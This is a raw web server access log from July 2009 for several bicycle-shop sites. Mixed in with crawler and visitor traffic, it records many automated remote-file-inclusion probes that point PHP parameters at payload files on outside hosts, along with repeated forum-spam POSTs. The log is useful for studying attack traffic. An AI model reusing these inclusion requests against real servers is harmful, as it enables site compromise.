92.48.127.79 - - [10/Jul/2009:04:20:02 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
92.48.127.79 - - [10/Jul/2009:04:22:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:22:53 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:22:53 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:22:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:23:34 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:23:34 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:23:34 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
92.48.127.79 - - [10/Jul/2009:04:23:34 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
217.169.210.130 - - [10/Jul/2009:04:41:31 -0700] "GET /logs/access_081010.log//index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "houstonbikeshop.com"
217.169.210.130 - - [10/Jul/2009:04:41:31 -0700] "GET /index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "houstonbikeshop.com"
217.169.210.130 - - [10/Jul/2009:04:41:31 -0700] "GET /logs//index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "houstonbikeshop.com"
208.80.195.37 - - [10/Jul/2009:04:41:40 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1)" "www.svbikes.com"
65.55.106.182 - - [10/Jul/2009:04:41:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
218.49.29.200 - - [10/Jul/2009:04:43:18 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.49.29.200 - - [10/Jul/2009:04:43:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.49.29.200 - - [10/Jul/2009:04:43:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://bangsat2.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.148.238.69 - - [10/Jul/2009:04:54:15 -0700] "GET /logs/access_081010.log//index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
79.148.238.69 - - [10/Jul/2009:04:54:16 -0700] "GET /index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
79.148.238.69 - - [10/Jul/2009:04:54:17 -0700] "GET /logs//index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
65.55.211.175 - - [10/Jul/2009:05:02:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "houstonbikeshop.com"
65.55.211.175 - - [10/Jul/2009:05:02:46 -0700] "GET / HTTP/1.1" 200 1764 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "houstonbikeshop.com"
65.55.106.242 - - [10/Jul/2009:05:09:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
72.30.142.168 - - [10/Jul/2009:05:09:21 -0700] "GET /tmp/?S=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
65.55.51.112 - - [10/Jul/2009:05:28:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
81.19.66.38 - - [10/Jul/2009:05:50:12 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:05:50:12 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:05:50:13 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:05:50:14 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:05:50:14 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
210.110.97.12 - - [10/Jul/2009:05:53:51 -0700] "GET /logs//vwar/backup/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.110.97.12 - - [10/Jul/2009:05:53:51 -0700] "GET /logs/access_081010.log%20%20//vwar/backup/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.110.97.12 - - [10/Jul/2009:05:53:56 -0700] "GET /vwar/backup/errors.php?error=http://rainmaker.co.th/images/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:08:21 -0700] "GET /bullitinboard/viewtopic.php?p=15375/index.php?p=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 533 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:08:22 -0700] "GET /bullitinboard/viewtopic.php?p=15375/index.php?p=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 533 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:08:22 -0700] "GET /index.php?p=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:08:23 -0700] "GET /index.php?p=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:08:23 -0700] "GET /bullitinboard/index.php?p=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 533 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:08:24 -0700] "GET /bullitinboard/index.php?p=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 533 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:14:38 -0700] "GET /bullitinboard/viewtopic.php?p=15375/index2.php?page=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 533 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:14:40 -0700] "GET /index2.php?page=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:14:41 -0700] "GET /bullitinboard/index2.php?page=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:14:41 -0700] "GET /bullitinboard/viewtopic.php?p=15375/index2.php?page=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 533 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:14:42 -0700] "GET /index2.php?page=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.146.231.194 - - [10/Jul/2009:06:14:43 -0700] "GET /bullitinboard/index2.php?page=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:06:17:04 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.30.142.217 - - [10/Jul/2009:06:18:27 -0700] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:06:25:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
65.55.106.142 - - [10/Jul/2009:06:28:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:06:31:01 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
65.55.211.66 - - [10/Jul/2009:06:47:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.66 - - [10/Jul/2009:06:47:12 -0700] "GET /?N=A HTTP/1.1" 200 1764 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:06:58:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:06:58:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
84.17.129.100 - - [10/Jul/2009:06:59:53 -0700] "GET /appserv/main.php?appserv_root=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.17.129.100 - - [10/Jul/2009:06:59:53 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
84.17.129.100 - - [10/Jul/2009:06:59:53 -0700] "GET /logs//appserv/main.php?appserv_root=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [10/Jul/2009:07:04:29 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [10/Jul/2009:07:04:29 -0700] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.245.23.158 - - [10/Jul/2009:07:04:29 -0700] "GET /appserv/main.php?appserv_root=http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:07:07:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:07:13:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:07:13:55 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:07:19:59 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:07:19:59 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:07:20:00 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:07:20:01 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:07:20:01 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:07:28:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
66.11.230.36 - - [10/Jul/2009:07:36:53 -0700] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///includes/socialbookmark/includes/vendors/_notes/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [10/Jul/2009:07:36:53 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///includes/socialbookmark/includes/vendors/_notes/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.11.230.36 - - [10/Jul/2009:07:36:53 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///includes/socialbookmark/includes/vendors/_notes/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:07:37:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
218.150.78.235 - - [10/Jul/2009:07:38:29 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.150.78.235 - - [10/Jul/2009:07:38:29 -0700] "GET /translations/Czech.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.150.78.235 - - [10/Jul/2009:07:38:29 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
218.150.78.235 - - [10/Jul/2009:07:38:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
65.55.211.64 - - [10/Jul/2009:07:41:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.64 - - [10/Jul/2009:07:41:57 -0700] "GET /tmp/?N=D HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:07:43:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
218.150.78.235 - - [10/Jul/2009:07:47:26 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
218.150.78.235 - - [10/Jul/2009:07:47:26 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
218.150.78.235 - - [10/Jul/2009:07:47:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
218.150.78.235 - - [10/Jul/2009:07:47:26 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
66.11.230.36 - - [10/Jul/2009:07:52:24 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.scoringsessions.com///includes/socialbookmark/includes/vendors/_notes/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.81.154 - - [10/Jul/2009:08:15:53 -0700] "GET /logs/access_090210.log HTTP/1.0" 200 6993973 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
65.55.211.75 - - [10/Jul/2009:08:19:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.211.75 - - [10/Jul/2009:08:19:43 -0700] "GET /logs/access_090110.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
98.200.138.235 - - [10/Jul/2009:08:26:07 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.fisherbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" "www.svbikes.com"
98.200.138.235 - - [10/Jul/2009:08:26:15 -0700] "GET /Employeesite/ HTTP/1.1" 401 395 "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:09:18:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
65.55.106.231 - - [10/Jul/2009:09:21:10 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jul/2009:09:26:25 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jul/2009:09:33:56 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
66.102.237.81 - - [10/Jul/2009:09:43:18 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
66.102.237.81 - - [10/Jul/2009:09:43:18 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
66.102.237.81 - - [10/Jul/2009:09:43:18 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "houstonbikeshop.com"
81.19.67.243 - - [10/Jul/2009:09:53:58 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
201.144.60.2 - - [10/Jul/2009:09:58:22 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.svbikes.com"
81.19.66.38 - - [10/Jul/2009:10:03:48 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:10:03:48 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:10:03:49 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:10:03:53 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jul/2009:10:04:00 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
205.234.187.238 - - [10/Jul/2009:10:26:32 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
205.234.187.238 - - [10/Jul/2009:10:26:32 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
205.234.187.238 - - [10/Jul/2009:10:26:32 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "houstonbikeshop.com"
211.203.180.144 - - [10/Jul/2009:10:42:49 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.203.180.144 - - [10/Jul/2009:10:42:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.203.180.144 - - [10/Jul/2009:10:42:49 -0700] "GET /translations/Czech.txt//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.203.180.144 - - [10/Jul/2009:10:42:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.203.180.144 - - [10/Jul/2009:10:48:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
211.203.180.144 - - [10/Jul/2009:10:48:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.svbikes.com"
69.175.18.50 - - [10/Jul/2009:10:52:33 -0700] "GET /logs//login.php?dir=http://cajobifm.com.br/2008//images/banners_popup/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
69.175.18.50 - - [10/Jul/2009:10:52:33 -0700] "GET /logs/access.log//login.php?dir=http://cajobifm.com.br/2008//images/banners_popup/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
69.175.18.50 - - [10/Jul/2009:10:52:34 -0700] "GET /login.php?dir=http://cajobifm.com.br/2008//images/banners_popup/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
69.175.18.50 - - [10/Jul/2009:10:53:20 -0700] "GET /logs/access.log//login.php?dir=http://cajobifm.com.br/2008//images/banners_popup/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
69.175.18.50 - - [10/Jul/2009:10:53:21 -0700] "GET /logs//login.php?dir=http://cajobifm.com.br/2008//images/banners_popup/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
69.175.18.50 - - [10/Jul/2009:10:53:21 -0700] "GET /login.php?dir=http://cajobifm.com.br/2008//images/banners_popup/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "houstonbikeshop.com"
91.121.150.170 - - [10/Jul/2009:10:58:50 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
